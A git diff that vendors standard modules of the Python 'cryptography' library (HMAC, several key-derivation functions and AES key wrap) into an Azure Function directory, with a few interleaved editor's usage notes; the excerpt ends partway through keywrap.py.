b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hmac.py new file mode 100644 index 0000000..4b71f3e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hmac.py @@ -0,0 +1,72 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
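[Editor's note] The concrete algorithm classes above plug into the Hash context defined earlier in the same file. A minimal sketch of an incremental SHA-256 digest (sample data is illustrative):

from cryptography.hazmat.primitives import hashes

digest = hashes.Hash(hashes.SHA256())
digest.update(b"abc")
digest.update(b"def")       # equivalent to hashing b"abcdef" in one call
value = digest.finalize()   # 32 bytes; any further update() raises AlreadyFinalized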
+ + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, +) +from cryptography.hazmat.backends.openssl.hmac import _HMACContext +from cryptography.hazmat.primitives import hashes + + +class HMAC(hashes.HashContext): + _ctx: typing.Optional[_HMACContext] + + def __init__( + self, + key: bytes, + algorithm: hashes.HashAlgorithm, + backend: typing.Any = None, + ctx=None, + ): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + self._algorithm = algorithm + + self._key = key + if ctx is None: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + self._ctx = ossl.create_hmac_ctx(key, self.algorithm) + else: + self._ctx = ctx + + @property + def algorithm(self) -> hashes.HashAlgorithm: + return self._algorithm + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + utils._check_byteslike("data", data) + self._ctx.update(data) + + def copy(self) -> "HMAC": + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return HMAC( + self._key, + self.algorithm, + ctx=self._ctx.copy(), + ) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + digest = self._ctx.finalize() + self._ctx = None + return digest + + def verify(self, signature: bytes) -> None: + utils._check_bytes("signature", signature) + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + ctx, self._ctx = self._ctx, None + ctx.verify(signature) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__init__.py new file mode 100644 index 0000000..8e1270a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__init__.py @@ -0,0 +1,22 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + + +class KeyDerivationFunction(metaclass=abc.ABCMeta): + @abc.abstractmethod + def derive(self, key_material: bytes) -> bytes: + """ + Deterministically generates and returns a new key based on the existing + key material. + """ + + @abc.abstractmethod + def verify(self, key_material: bytes, expected_key: bytes) -> None: + """ + Checks whether the key generated by the key material matches the + expected derived key. Raises an exception if they do not match. 
+ """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..a5a01d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc new file mode 100644 index 0000000..7b94f5f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc new file mode 100644 index 0000000..5565032 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc new file mode 100644 index 0000000..f122845 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc new file mode 100644 index 0000000..036e270 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc new file mode 100644 index 0000000..078cd31 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc new file mode 100644 index 0000000..6b35ce0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/concatkdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/concatkdf.py new file mode 100644 index 0000000..03ed5cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/concatkdf.py @@ -0,0 +1,130 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, +) +from cryptography.hazmat.primitives import constant_time, hashes, hmac +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +def _int_to_u32be(n: int) -> bytes: + return n.to_bytes(length=4, byteorder="big") + + +def _common_args_checks( + algorithm: hashes.HashAlgorithm, + length: int, + otherinfo: typing.Optional[bytes], +) -> None: + max_length = algorithm.digest_size * (2**32 - 1) + if length > max_length: + raise ValueError( + "Cannot derive keys larger than {} bits.".format(max_length) + ) + if otherinfo is not None: + utils._check_bytes("otherinfo", otherinfo) + + +def _concatkdf_derive( + key_material: bytes, + length: int, + auxfn: typing.Callable[[], hashes.HashContext], + otherinfo: bytes, +) -> bytes: + utils._check_byteslike("key_material", key_material) + output = [b""] + outlen = 0 + counter = 1 + + while length > outlen: + h = auxfn() + h.update(_int_to_u32be(counter)) + h.update(key_material) + h.update(otherinfo) + output.append(h.finalize()) + outlen += len(output[-1]) + counter += 1 + + return b"".join(output)[:length] + + +class ConcatKDFHash(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + otherinfo: typing.Optional[bytes], + backend: typing.Any = None, + ): + _common_args_checks(algorithm, length, otherinfo) + self._algorithm = algorithm + self._length = length + self._otherinfo: bytes = otherinfo if otherinfo is not None else b"" + + self._used = False + + def _hash(self) -> hashes.Hash: + return hashes.Hash(self._algorithm) + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized + self._used = True + return _concatkdf_derive( + key_material, self._length, self._hash, self._otherinfo + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey + + +class ConcatKDFHMAC(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: typing.Optional[bytes], + otherinfo: typing.Optional[bytes], + backend: typing.Any = None, + ): + _common_args_checks(algorithm, length, otherinfo) + self._algorithm = algorithm + self._length = length + self._otherinfo: bytes = otherinfo if otherinfo is not None else b"" + + if algorithm.block_size is None: + raise 
TypeError( + "{} is unsupported for ConcatKDF".format(algorithm.name) + ) + + if salt is None: + salt = b"\x00" * algorithm.block_size + else: + utils._check_bytes("salt", salt) + + self._salt = salt + + self._used = False + + def _hmac(self) -> hmac.HMAC: + return hmac.HMAC(self._salt, self._algorithm) + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized + self._used = True + return _concatkdf_derive( + key_material, self._length, self._hmac, self._otherinfo + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/hkdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/hkdf.py new file mode 100644 index 0000000..d25f0e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/hkdf.py @@ -0,0 +1,103 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, +) +from cryptography.hazmat.primitives import constant_time, hashes, hmac +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +class HKDF(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: typing.Optional[bytes], + info: typing.Optional[bytes], + backend: typing.Any = None, + ): + self._algorithm = algorithm + + if salt is None: + salt = b"\x00" * self._algorithm.digest_size + else: + utils._check_bytes("salt", salt) + + self._salt = salt + + self._hkdf_expand = HKDFExpand(self._algorithm, length, info) + + def _extract(self, key_material: bytes) -> bytes: + h = hmac.HMAC(self._salt, self._algorithm) + h.update(key_material) + return h.finalize() + + def derive(self, key_material: bytes) -> bytes: + utils._check_byteslike("key_material", key_material) + return self._hkdf_expand.derive(self._extract(key_material)) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey + + +class HKDFExpand(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + info: typing.Optional[bytes], + backend: typing.Any = None, + ): + self._algorithm = algorithm + + max_length = 255 * algorithm.digest_size + + if length > max_length: + raise ValueError( + "Cannot derive keys larger than {} octets.".format(max_length) + ) + + self._length = length + + if info is None: + info = b"" + else: + utils._check_bytes("info", info) + + self._info = info + + self._used = False + + def _expand(self, key_material: bytes) -> bytes: + output = [b""] + counter = 1 + + while self._algorithm.digest_size * (len(output) - 1) < self._length: + h = hmac.HMAC(key_material, self._algorithm) + h.update(output[-1]) + h.update(self._info) + h.update(bytes([counter])) + output.append(h.finalize()) + counter += 1 + + return b"".join(output)[: self._length] + + def derive(self, key_material: bytes) -> bytes: + utils._check_byteslike("key_material", key_material) + if self._used: + raise 
AlreadyFinalized + + self._used = True + return self._expand(key_material) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/kbkdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/kbkdf.py new file mode 100644 index 0000000..b84c2ab --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/kbkdf.py @@ -0,0 +1,258 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import ( + ciphers, + cmac, + constant_time, + hashes, + hmac, +) +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +class Mode(utils.Enum): + CounterMode = "ctr" + + +class CounterLocation(utils.Enum): + BeforeFixed = "before_fixed" + AfterFixed = "after_fixed" + + +class _KBKDFDeriver: + def __init__( + self, + prf: typing.Callable, + mode: Mode, + length: int, + rlen: int, + llen: typing.Optional[int], + location: CounterLocation, + label: typing.Optional[bytes], + context: typing.Optional[bytes], + fixed: typing.Optional[bytes], + ): + assert callable(prf) + + if not isinstance(mode, Mode): + raise TypeError("mode must be of type Mode") + + if not isinstance(location, CounterLocation): + raise TypeError("location must be of type CounterLocation") + + if (label or context) and fixed: + raise ValueError( + "When supplying fixed data, " "label and context are ignored." + ) + + if rlen is None or not self._valid_byte_length(rlen): + raise ValueError("rlen must be between 1 and 4") + + if llen is None and fixed is None: + raise ValueError("Please specify an llen") + + if llen is not None and not isinstance(llen, int): + raise TypeError("llen must be an integer") + + if label is None: + label = b"" + + if context is None: + context = b"" + + utils._check_bytes("label", label) + utils._check_bytes("context", context) + self._prf = prf + self._mode = mode + self._length = length + self._rlen = rlen + self._llen = llen + self._location = location + self._label = label + self._context = context + self._used = False + self._fixed_data = fixed + + @staticmethod + def _valid_byte_length(value: int) -> bool: + if not isinstance(value, int): + raise TypeError("value must be of type int") + + value_bin = utils.int_to_bytes(1, value) + if not 1 <= len(value_bin) <= 4: + return False + return True + + def derive(self, key_material: bytes, prf_output_size: int) -> bytes: + if self._used: + raise AlreadyFinalized + + utils._check_byteslike("key_material", key_material) + self._used = True + + # inverse floor division (equivalent to ceiling) + rounds = -(-self._length // prf_output_size) + + output = [b""] + + # For counter mode, the number of iterations shall not be + # larger than 2^r-1, where r <= 32 is the binary length of the counter + # This ensures that the counter values used as an input to the + # PRF will not repeat during a particular call to the KDF function. 
+ r_bin = utils.int_to_bytes(1, self._rlen) + if rounds > pow(2, len(r_bin) * 8) - 1: + raise ValueError("There are too many iterations.") + + for i in range(1, rounds + 1): + h = self._prf(key_material) + + counter = utils.int_to_bytes(i, self._rlen) + if self._location == CounterLocation.BeforeFixed: + h.update(counter) + + h.update(self._generate_fixed_input()) + + if self._location == CounterLocation.AfterFixed: + h.update(counter) + + output.append(h.finalize()) + + return b"".join(output)[: self._length] + + def _generate_fixed_input(self) -> bytes: + if self._fixed_data and isinstance(self._fixed_data, bytes): + return self._fixed_data + + l_val = utils.int_to_bytes(self._length * 8, self._llen) + + return b"".join([self._label, b"\x00", self._context, l_val]) + + +class KBKDFHMAC(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + mode: Mode, + length: int, + rlen: int, + llen: typing.Optional[int], + location: CounterLocation, + label: typing.Optional[bytes], + context: typing.Optional[bytes], + fixed: typing.Optional[bytes], + backend: typing.Any = None, + ): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported hash algorithm.", + _Reasons.UNSUPPORTED_HASH, + ) + + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.hmac_supported(algorithm): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported hmac algorithm.", + _Reasons.UNSUPPORTED_HASH, + ) + + self._algorithm = algorithm + + self._deriver = _KBKDFDeriver( + self._prf, + mode, + length, + rlen, + llen, + location, + label, + context, + fixed, + ) + + def _prf(self, key_material: bytes) -> hmac.HMAC: + return hmac.HMAC(key_material, self._algorithm) + + def derive(self, key_material: bytes) -> bytes: + return self._deriver.derive(key_material, self._algorithm.digest_size) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey + + +class KBKDFCMAC(KeyDerivationFunction): + def __init__( + self, + algorithm, + mode: Mode, + length: int, + rlen: int, + llen: typing.Optional[int], + location: CounterLocation, + label: typing.Optional[bytes], + context: typing.Optional[bytes], + fixed: typing.Optional[bytes], + backend: typing.Any = None, + ): + if not issubclass( + algorithm, ciphers.BlockCipherAlgorithm + ) or not issubclass(algorithm, ciphers.CipherAlgorithm): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported cipher algorithm.", + _Reasons.UNSUPPORTED_CIPHER, + ) + + self._algorithm = algorithm + self._cipher: typing.Optional[ciphers.BlockCipherAlgorithm] = None + + self._deriver = _KBKDFDeriver( + self._prf, + mode, + length, + rlen, + llen, + location, + label, + context, + fixed, + ) + + def _prf(self, _: bytes) -> cmac.CMAC: + assert self._cipher is not None + + return cmac.CMAC(self._cipher) + + def derive(self, key_material: bytes) -> bytes: + self._cipher = self._algorithm(key_material) + + assert self._cipher is not None + + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.cmac_algorithm_supported(self._cipher): + raise UnsupportedAlgorithm( + "Algorithm supplied is not a supported cipher algorithm.", + _Reasons.UNSUPPORTED_CIPHER, + ) + + return self._deriver.derive(key_material, self._cipher.block_size // 8) + + def verify(self, key_material: bytes, expected_key: bytes) -> 
None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/pbkdf2.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/pbkdf2.py new file mode 100644 index 0000000..a2b9392 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/pbkdf2.py @@ -0,0 +1,65 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import constant_time, hashes +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +class PBKDF2HMAC(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: bytes, + iterations: int, + backend: typing.Any = None, + ): + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.pbkdf2_hmac_supported(algorithm): + raise UnsupportedAlgorithm( + "{} is not supported for PBKDF2 by this backend.".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + self._used = False + self._algorithm = algorithm + self._length = length + utils._check_bytes("salt", salt) + self._salt = salt + self._iterations = iterations + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized("PBKDF2 instances can only be used once.") + self._used = True + + utils._check_byteslike("key_material", key_material) + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.derive_pbkdf2_hmac( + self._algorithm, + self._length, + self._salt, + self._iterations, + key_material, + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + derived_key = self.derive(key_material) + if not constant_time.bytes_eq(derived_key, expected_key): + raise InvalidKey("Keys do not match.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/scrypt.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/scrypt.py new file mode 100644 index 0000000..fc2a131 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/scrypt.py @@ -0,0 +1,74 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
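[Editor's note] PBKDF2HMAC instances above are single-use: derive() or verify() may be called once per instance. A minimal password-derivation sketch; the iteration count is illustrative, not a recommendation:

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

salt = os.urandom(16)
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=390000)
key = kdf.derive(b"my great password")

# verification needs a fresh instance with identical parameters
kdf2 = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=390000)
kdf2.verify(b"my great password", key)  # raises InvalidKey on mismatch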
+ + +import sys +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, + UnsupportedAlgorithm, +) +from cryptography.hazmat.primitives import constant_time +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +# This is used by the scrypt tests to skip tests that require more memory +# than the MEM_LIMIT +_MEM_LIMIT = sys.maxsize // 2 + + +class Scrypt(KeyDerivationFunction): + def __init__( + self, + salt: bytes, + length: int, + n: int, + r: int, + p: int, + backend: typing.Any = None, + ): + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + if not ossl.scrypt_supported(): + raise UnsupportedAlgorithm( + "This version of OpenSSL does not support scrypt" + ) + self._length = length + utils._check_bytes("salt", salt) + if n < 2 or (n & (n - 1)) != 0: + raise ValueError("n must be greater than 1 and be a power of 2.") + + if r < 1: + raise ValueError("r must be greater than or equal to 1.") + + if p < 1: + raise ValueError("p must be greater than or equal to 1.") + + self._used = False + self._salt = salt + self._n = n + self._r = r + self._p = p + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized("Scrypt instances can only be used once.") + self._used = True + + utils._check_byteslike("key_material", key_material) + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.derive_scrypt( + key_material, self._salt, self._length, self._n, self._r, self._p + ) + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + derived_key = self.derive(key_material) + if not constant_time.bytes_eq(derived_key, expected_key): + raise InvalidKey("Keys do not match.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/x963kdf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/x963kdf.py new file mode 100644 index 0000000..1438d45 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/kdf/x963kdf.py @@ -0,0 +1,65 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
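[Editor's note] Scrypt above rejects any n that is not a power of two greater than 1, and, like the other KDFs here, is single-use. A minimal sketch with commonly cited interactive-login parameters (illustrative only):

import os
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

salt = os.urandom(16)
kdf = Scrypt(salt=salt, length=32, n=2**14, r=8, p=1)
key = kdf.derive(b"my great password")  # a second derive() raises AlreadyFinalized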
+ + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + InvalidKey, +) +from cryptography.hazmat.primitives import constant_time, hashes +from cryptography.hazmat.primitives.kdf import KeyDerivationFunction + + +def _int_to_u32be(n: int) -> bytes: + return n.to_bytes(length=4, byteorder="big") + + +class X963KDF(KeyDerivationFunction): + def __init__( + self, + algorithm: hashes.HashAlgorithm, + length: int, + sharedinfo: typing.Optional[bytes], + backend: typing.Any = None, + ): + max_len = algorithm.digest_size * (2**32 - 1) + if length > max_len: + raise ValueError( + "Cannot derive keys larger than {} bits.".format(max_len) + ) + if sharedinfo is not None: + utils._check_bytes("sharedinfo", sharedinfo) + + self._algorithm = algorithm + self._length = length + self._sharedinfo = sharedinfo + self._used = False + + def derive(self, key_material: bytes) -> bytes: + if self._used: + raise AlreadyFinalized + self._used = True + utils._check_byteslike("key_material", key_material) + output = [b""] + outlen = 0 + counter = 1 + + while self._length > outlen: + h = hashes.Hash(self._algorithm) + h.update(key_material) + h.update(_int_to_u32be(counter)) + if self._sharedinfo is not None: + h.update(self._sharedinfo) + output.append(h.finalize()) + outlen += len(output[-1]) + counter += 1 + + return b"".join(output)[: self._length] + + def verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/keywrap.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/keywrap.py new file mode 100644 index 0000000..fb46f0d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/keywrap.py @@ -0,0 +1,176 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
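[Editor's note] X963KDF above implements the ANSI X9.63 construction, typically applied to a key-agreement output such as an ECDH shared secret. A minimal sketch; the shared secret here is random stand-in data:

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.x963kdf import X963KDF

shared_secret = os.urandom(32)  # stand-in for a real ECDH shared secret
xkdf = X963KDF(algorithm=hashes.SHA256(), length=32, sharedinfo=b"handshake data")
key = xkdf.derive(shared_secret)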
+ + +import typing + +from cryptography.hazmat.primitives.ciphers import Cipher +from cryptography.hazmat.primitives.ciphers.algorithms import AES +from cryptography.hazmat.primitives.ciphers.modes import ECB +from cryptography.hazmat.primitives.constant_time import bytes_eq + + +def _wrap_core( + wrapping_key: bytes, + a: bytes, + r: typing.List[bytes], +) -> bytes: + # RFC 3394 Key Wrap - 2.2.1 (index method) + encryptor = Cipher(AES(wrapping_key), ECB()).encryptor() + n = len(r) + for j in range(6): + for i in range(n): + # every encryption operation is a discrete 16 byte chunk (because + # AES has a 128-bit block size) and since we're using ECB it is + # safe to reuse the encryptor for the entire operation + b = encryptor.update(a + r[i]) + a = ( + int.from_bytes(b[:8], byteorder="big") ^ ((n * j) + i + 1) + ).to_bytes(length=8, byteorder="big") + r[i] = b[-8:] + + assert encryptor.finalize() == b"" + + return a + b"".join(r) + + +def aes_key_wrap( + wrapping_key: bytes, + key_to_wrap: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + if len(key_to_wrap) < 16: + raise ValueError("The key to wrap must be at least 16 bytes") + + if len(key_to_wrap) % 8 != 0: + raise ValueError("The key to wrap must be a multiple of 8 bytes") + + a = b"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6" + r = [key_to_wrap[i : i + 8] for i in range(0, len(key_to_wrap), 8)] + return _wrap_core(wrapping_key, a, r) + + +def _unwrap_core( + wrapping_key: bytes, + a: bytes, + r: typing.List[bytes], +) -> typing.Tuple[bytes, typing.List[bytes]]: + # Implement RFC 3394 Key Unwrap - 2.2.2 (index method) + decryptor = Cipher(AES(wrapping_key), ECB()).decryptor() + n = len(r) + for j in reversed(range(6)): + for i in reversed(range(n)): + atr = ( + int.from_bytes(a, byteorder="big") ^ ((n * j) + i + 1) + ).to_bytes(length=8, byteorder="big") + r[i] + # every decryption operation is a discrete 16 byte chunk so + # it is safe to reuse the decryptor for the entire operation + b = decryptor.update(atr) + a = b[:8] + r[i] = b[-8:] + + assert decryptor.finalize() == b"" + return a, r + + +def aes_key_wrap_with_padding( + wrapping_key: bytes, + key_to_wrap: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + aiv = b"\xA6\x59\x59\xA6" + len(key_to_wrap).to_bytes( + length=4, byteorder="big" + ) + # pad the key to wrap if necessary + pad = (8 - (len(key_to_wrap) % 8)) % 8 + key_to_wrap = key_to_wrap + b"\x00" * pad + if len(key_to_wrap) == 8: + # RFC 5649 - 4.1 - exactly 8 octets after padding + encryptor = Cipher(AES(wrapping_key), ECB()).encryptor() + b = encryptor.update(aiv + key_to_wrap) + assert encryptor.finalize() == b"" + return b + else: + r = [key_to_wrap[i : i + 8] for i in range(0, len(key_to_wrap), 8)] + return _wrap_core(wrapping_key, aiv, r) + + +def aes_key_unwrap_with_padding( + wrapping_key: bytes, + wrapped_key: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapped_key) < 16: + raise InvalidUnwrap("Must be at least 16 bytes") + + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + if len(wrapped_key) == 16: + # RFC 5649 - 4.2 - exactly two 64-bit blocks + decryptor = Cipher(AES(wrapping_key), ECB()).decryptor() + out = decryptor.update(wrapped_key) + assert decryptor.finalize() == b"" + a = out[:8] + data = out[8:] + 
